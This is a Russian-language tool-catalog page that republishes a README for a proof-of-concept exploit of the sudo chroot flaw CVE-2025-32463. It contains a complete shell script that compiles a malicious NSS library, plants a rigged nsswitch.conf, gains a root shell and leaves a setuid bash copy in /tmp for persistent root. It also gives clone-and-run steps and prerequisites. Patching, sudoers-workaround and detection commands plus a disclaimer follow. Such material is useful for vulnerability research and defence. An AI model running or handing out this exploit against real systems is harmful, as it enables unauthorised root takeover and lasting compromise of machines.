Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32463 — Эксплойт локального повышения привилегий для CVE-2025-32463, нацеленный на недостаток проектирования sudo chroot. Предоставляет PoC-скрипт, технический анализ и рекомендации по смягчению для уязвимых версий sudo 1.9.14-1.9.17. | Kitploit
Инструменты/GitHubGitHub/kaiht-ladiant/cve-2025-32463
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubkaiht-ladiant/cve-2025-32463

CVE-2025-32463

Эксплойт локального повышения привилегий для CVE-2025-32463, нацеленный на недостаток проектирования sudo chroot. Предоставляет PoC-скрипт, технический анализ и рекомендации по смягчению для уязвимых версий sudo 1.9.14-1.9.17.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
211 год назадЕщё не проверено

CVE-2025-32463 - Эксплойт повышения привилегий через chroot в sudo

Обзор

CVE-2025-32463 — это критическая уязвимость локального повышения привилегий в sudo версий с 1.9.14 по 1.9.17. Уязвимость позволяет атакующим, имеющим привилегии sudo, повысить их до root, используя недостаток логики обработки опции chroot.

Детали уязвимости

  • CVE ID: CVE-2025-32463
  • Затронутые версии: sudo 1.9.14 - 1.9.17
  • Тип уязвимости: локальное повышение привилегий (LPE)
  • Серьезность: критическая
  • Исправленная версия: sudo 1.9.17p1 и выше

Техническое описание

Уязвимость возникает из-за проблемы синхронизации в процессе проверки безопасности sudo. Функция pivot_root выполняется до проверки политики безопасности, что позволяет атакующим манипулировать файловой системой, которую sudo использует для аутентификации и авторизации.

Схема атаки

  1. Манипуляция окружением: Атакующий создает подконтрольное chroot-окружение с вредоносным nsswitch.conf
  2. Внедрение библиотеки: Вредоносная библиотека NSS (Name Service Switch) помещается в подконтрольное окружение
  3. Повышение привилегий: sudo загружает и выполняет вредоносную библиотеку с привилегиями root
  4. Доступ root: Атакующий получает полный доступ к оболочке root

Затронутые функции

  • pivot_root: Выполняется слишком рано
  • set_cmnd_path: Работает в манипулированном окружении
  • command_matches: Проверки безопасности обходятся из-за манипуляции окружением

Предварительные требования

Перед использованием эксплойта убедитесь, что выполнены следующие условия:

  • Целевая система использует sudo версии 1.9.14 - 1.9.17
  • Текущий пользователь имеет привилегии sudo
  • Конфигурация sudoers разрешает операции chroot
  • Компилятор gcc доступен в целевой системе
  • Доступ на запись во временные каталоги (например, /tmp)

Использование

Быстрый старт

  1. Клонируйте репозиторий:
root@kitploit:~
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
  1. Сделайте скрипт исполняемым:
root@kitploit:~
chmod +x cve-2025-32463.sh
  1. Запустите эксплойт:
root@kitploit:~
./cve-2025-32463.sh

Ручная проверка

Проверьте, уязвима ли целевая система:

root@kitploit:~
# Проверить версию sudo
sudo --version

# Проверить привилегии sudo
sudo -l

# Поиск разрешений, связанных с chroot
sudo -l | grep chroot

Код эксплойта

Основной скрипт эксплойта (cve-2025-32463.sh):

root@kitploit:~
#!/bin/bash
# CVE-2025-32463 PoC - повышение привилегий через chroot в sudo
# Основано на исследовании Rich Mirch @ Stratascale Cyber Research Unit

STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>

void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  system("id > /tmp/pwned_proof.txt");
  system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
  execl("/bin/bash", "/bin/bash", NULL);
}
CEOF

mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c

echo "[*] Эксплуатация CVE-2025-32463..."
echo "[*] Попытка повышения привилегий..."
sudo -R pentest pentest

# Очистка
rm -rf ${STAGE?}

Проверка

После успешной эксплуатации проверьте доступ root:

root@kitploit:~
# Проверить текущие привилегии
whoami

# Проверить файл подтверждения
cat /tmp/pwned_proof.txt

# Использовать setuid bash для постоянного доступа root
/tmp/rootbash -p

Меры защиты

Немедленные действия

  1. Обновите sudo до версии 1.9.17p1 или выше:

    root@kitploit:~
    # Ubuntu/Debian
    sudo apt update && sudo apt upgrade sudo
    
    # CentOS/RHEL
    sudo yum update sudo
    
    # или
    sudo dnf update sudo
    
  2. Удалите директивы chroot из sudoers (временное обходное решение):

    root@kitploit:~
    # Создать резервную копию текущей конфигурации
    sudo cp /etc/sudoers /etc/sudoers.backup
    
    # Удалить записи, связанные с chroot
    sudo sed -i '/chroot/d' /etc/sudoers
    
    # Проверить синтаксис
    sudo visudo -c
    

Обнаружение

Отслеживайте попытки эксплуатации:

root@kitploit:~
# Проверить подозрительные временные каталоги
find /tmp -name "*.stage.*" -type d

# Мониторить журналы sudo
tail -f /var/log/auth.log | grep sudo

# Искать скомпилированные библиотеки NSS
find /tmp -name "libnss_*.so*" -type f

Технические детали

Анализ первопричины

Уязвимость связана с ошибкой проектирования в потоке выполнения sudo:

  1. Нормальный ожидаемый поток:

    • Разбор пользовательского ввода
    • Проверка политики sudoers
    • Настройка окружения (включая chroot)
    • Выполнение команды
  2. Фактический уязвимый поток:

    • Разбор пользовательского ввода
    • Выполнение chroot (pivot_root) - здесь возникает проблема
    • Проверка политики sudoers (в манипулированном окружении)
    • Выполнение команды

Эксплуатация библиотеки NSS

Эксплойт использует систему Name Service Switch (NSS):

  1. sudo читает /etc/nsswitch.conf для аутентификации пользователя
  2. В chroot-окружении атакующий контролирует этот файл
  3. Вредоносная библиотека NSS загружается с привилегиями root
  4. Конструктор библиотеки выполняет произвольный код от имени root

Среда тестирования

Этот эксплойт был протестирован на:

  • Ubuntu 20.04/22.04 с sudo 1.9.15
  • Debian 11/12 с sudo 1.9.14-1.9.17
  • CentOS 8/9 с затронутыми версиями sudo
  • Контейнеры Docker с уязвимыми установками sudo

Ссылки

  • Официальное уведомление безопасности sudo
  • Оригинальное исследование Rich Mirch
  • Анализ исходного кода sudo

Отказ от ответственности

⚠️ ВАЖНЫЙ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ ⚠️

Этот инструмент предоставляется только для образовательных и авторизованных целей тестирования.

  • Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение
  • Несанкционированное использование этого эксплойта незаконно и неэтично
  • Авторы не несут ответственности за любое неправомерное использование или ущерб
  • Всегда убедитесь, что у вас есть соответствующие разрешения перед проведением тестирования безопасности

Вклад

Вклад приветствуется! Пожалуйста:

  1. Сделайте форк репозитория
  2. Создайте ветку функции
  3. Отправьте pull request с подробным описанием

Лицензия

Этот проект лицензирован по лицензии MIT — подробности в файле LICENSE.

Журнал изменений

v1.0.0

  • Первоначальный выпуск
  • Базовая функциональность эксплойта
  • Подробная документация

Примечание: Эта уязвимость затрагивает критический компонент системы. Пожалуйста, используйте ответственно и убедитесь, что все тестирование авторизовано.

Скачать инструмент